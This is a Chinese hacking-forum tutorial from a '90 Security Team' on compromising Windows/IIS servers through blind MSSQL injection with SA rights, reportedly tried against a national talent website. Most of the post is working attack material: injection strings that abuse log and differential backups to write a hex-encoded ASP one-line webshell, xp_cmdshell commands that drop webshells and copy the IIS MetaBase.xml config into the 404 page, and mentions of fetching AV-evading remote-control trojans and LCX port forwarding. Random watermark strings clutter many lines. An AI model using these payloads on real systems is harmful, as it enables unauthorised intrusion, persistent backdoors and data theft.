中国网络渗透测试联盟

标题: sa权限的教程. [打印本页]
作者: admin    时间: 2012-9-15 14:30
标题: sa权限的教程.
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————( R. K" a4 `" m3 h. b
( ~1 j0 S& i/ u# T. A

9 `$ e* W: P; N                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
6 Z6 U; Q1 B5 I8 g* r. H) R8 L0 F' A2 F  E+ H! P
                                                                 
3 d6 E4 p" h- [, b) t: M4 t                                                                 
. j' t; p) Q0 H) R3 B/ P                                                                  论坛: http://www.90team.net/
, k/ F- H6 X" e) l2 w" o( W& S* y  y

9 F7 x; r- y1 p% T+ y
0 y) X2 \' n3 |; S/ r( d' ~5 `: e友情检测国家人才网
+ r3 J8 c4 M. w/ V4 E) V/ s9 C' C
" R. |# L. }7 k" z4 u/ x
内容:MSSQL注入SA权限不显错模式下的入侵$ U( w9 S) D$ S7 k4 l5 z, ]' G
- _/ Z. Q0 r; I+ n2 k7 \6 V6 C3 J( g

& H/ R, O5 r6 `* }% M: n一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
! E1 n% E) y) n" c
/ z: C! m) x$ b9 e3 Y我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
& g) y3 x& U# }9 X. l$ T$ f4 p5 ~+ ?, t' E8 k6 Y0 b; S

2 S9 F% K$ z3 z/ b2 @8 z$ u; ^这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
9 I% S3 V/ C7 G9 L' z0 P" s2 w  B' a9 c
/ i2 W& p7 [" G( C思路:
! }% Y! Z% {8 u+ M8 m3 y0 {! D0 M. l8 g
首先:  u" v/ u4 B5 u- m/ L  O" j$ u# H
* h% @4 j, E1 [& }
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。  I  V0 j0 e& h; a+ J8 e# G$ J
0 v# y  j- ^  P- a
1.日志备份获得Webshell/ C- d) a( w! ^5 f2 j0 e

8 x8 U4 N+ ^+ Q! i; Q9 K5 Z$ b2.数据库差异备份获得Webshell2 j  ~& e! \) g' o, t" ?

0 i6 Q2 G9 e5 t8 m0 {8 z7 E  b4.直接下载免杀远控木马。' M. f1 S5 x4 x# k5 L' }0 S  e

5 \, Q' C9 B! |5 H8 z2 E5.直接下载LCX将服务器端口转发出来
' i; R. P' f' j7 `  N6 U* e- N
, ]# P$ V; i; a' ^6 E6 u7 i1 c& j6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
8 j3 I- T6 P( g- G! b
5 Z% b5 a& T' {; A
' M" k9 D+ |9 n% x  s4 F4 o& k& N7 f& b& I. E. Z
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
, [( U3 U2 ^/ E- k: j' a4 O! A7 |5 {- v$ F) \/ A
我直接演示后面一个方法
% h9 ^6 y$ |$ r! x) }5 b  s  O9 i$ z
3 m6 ?  k4 G2 X( W# y2 }- o3 _/ k
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
% m: R' E$ U$ ?* V' m; j
" V  C2 V$ w. t# W4 X5 @7 S! ]0 H
4 `0 M2 Y5 l$ g# P8 ]1 C2 ?# V. s
, r  M# ?* b# m  g2 _% w4 {0 v: p' l7 U$ e; n
◆日志备份:
  o: J9 M" @) V2 F7 e% K9 h
* G/ I, n* [& {/ s* V9 H9 B+ `) k6 g& }0 H0 e, f: ^
1. 进行初始备份  h( y- z4 D  n0 K, N6 O
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
4 `  m2 v3 T- o* p6 M1 O6 S2 F' d4 W
& P5 Q, C: f1 J6 w  T* F5 Q; b2. 插入数据
! A$ ?: J& \: o, U;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--7 S7 ~+ L8 m, J* u% b' t

6 N3 K/ Y1 u0 k1 g8 z' E0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
2 g" R8 C3 t. j. i. [  
# ^9 K$ A! s; k; _* u3 w5 ]  n3. 备份并获得文件,删除临时表
) ^6 b# l1 \6 c7 v9 w;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--1 q. u( P6 M; }1 A) |

2 n( j% j2 g# P; }: X) B) B0 E1 _$ V
& j  ?+ E- l9 h9 w
◆数据库差异备份; a  D# X7 C  N- R: g4 i
, K! O5 k7 ]+ o( A2 G5 k! s1 Q
(1. 进行差异备份准备工作
9 u0 T4 w1 ]+ m
) l1 N. N; Z# V+ u& U- O;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--% g( y& w. t- V( p) r2 L

4 r2 S3 `* g% y) t上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码! C: m# `  L- o) B5 s/ D4 Y

( A+ P2 \" H5 ?( x1 L! r
% y% }0 v- R- K7 h% f) ]2 w5 W(2. 将数据写入到数据库
; n) R" g- H+ A8 a" p# g5 ]# d' v;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- $ ]9 t, ]+ X1 R1 K7 ~% E7 t) Z8 s+ M
2 A& c4 r7 S( h
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>+ K2 j: _& K, b
- w  @. b$ @, f% s/ W( w* z
3. 备份数据库并清理临时文件
9 ~( O% {( l' K# W3 c7 O! O. R3 }8 n, q: w; Q$ u4 u; ]" B$ V
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
+ `- k; v% b! e/ L% ^! y7 k+ C5 f# f$ S( H% c( e5 i! O' U
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 & I( R' [. x1 d- o8 P% [: d

8 g& X) C1 b) g; b3 G* S+ F7 S8 K  _2 `7 q4 g1 t5 h
0 e" W$ ^: Z' e
用^转义字符来写ASP(一句话木马)文件的方法:   
9 o7 x* Z9 u9 D# e* W* W& C3 w6 ?# I' h
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
4 Z$ n  i7 k/ M9 f* S4 Q
# R. E* i& t! F6 v. y* D2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
4 j, n2 s2 |; C7 L" U) l; l2 n# ~' J( b" n1 {
读取IIS配置信息获取web路径$ }8 ?/ G; g, j3 J: L3 T8 `
$ t* }& @  t+ ?5 K  t& O
     
" }6 H) B! d8 d0 s1 V% w     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--1 f7 k! V2 R- f! M& z" I: Y1 ]
0 c  ?$ ]' ~6 i- R9 ~
执行命令
$ _$ t5 n: g5 w/ f$ k     
# k7 [. Q1 z! m1 Y! s     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
3 G, ], e4 o1 x% |% J
7 c& B' i6 ]4 S! o$ w7 N' G  ?/ R. G. _8 m" J
/ j% X9 y4 ^8 e
- |6 j7 K: c7 W% A2 o+ T* M4 O

* J$ e; R( N( U! y! Y$ F# d5 T! k  M# j/ q3 f6 B$ Y
& _  E5 w1 o% F$ o( u5 A8 Z

3 G  \, G6 q% d1 k1 O  p' o. ]0 N1 ~9 }  ^/ `, k% \

- t* L- p( G, _$ j' V- _& O. B( o  J: z

3 B* Y' @  `0 L
( o% I/ h# I1 i
% F" @# a2 X# M$ [" Z
( m3 w, \8 j7 ~6 t) S) Z
8 w( T2 _6 c' X4 B1 M2 M" @
; H7 Z# s) }7 h; S
5 H7 ^7 T. B* p5 g: c& ?5 r- C
7 G# K+ \- i+ K; h
" D4 ~! }# Z+ e4 ?" x
5 O2 D/ i% C' z! O
% {: R% e5 i; ]( x/ b
" s/ I3 D  n( ^9 m" N
" x7 n. w* ]! ?+ t5 r% \$ G2 a, e, X$ t% t! I) E4 ^; q: y: G/ l
" A5 ^) h/ e1 P5 y7 |" i% ^+ ]
' X2 K  n% I* V1 m  ?- _+ C

; f& ~# ]; }- V- O6 d8 {
- Y( Z" [. V' I2 U2 \" S8 i" g' m

, z  b  W- @* K4 j) }( V# R, q5 w9 n4 `- C% c9 }( Y  z0 A9 C+ R
# ]( ^5 n! Q8 s  U" W7 I/ t

) |" F, l/ }; p
! Z* G+ Y/ a2 z# G4 V
5 P1 a, D# r; _  s; ]
" m0 A& ^1 M9 Y+ n  ]8 w" m8 ]

. [! P5 n' m' {. n! r9 ]
& I& ~9 b/ D5 o. I; s
& b) T% I8 I$ O$ d) G9 r  U3 A+ b$ g( ]( ?
( b7 P/ f$ p! w1 R: O

; k8 l8 A7 P/ ?) ]: N$ X4 W) n* i; H' q. r0 {3 V8 U' s
1 z4 u: C' K: {

9 K8 i( `2 l+ D7 T0 X* D% J5 m! q/ j




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2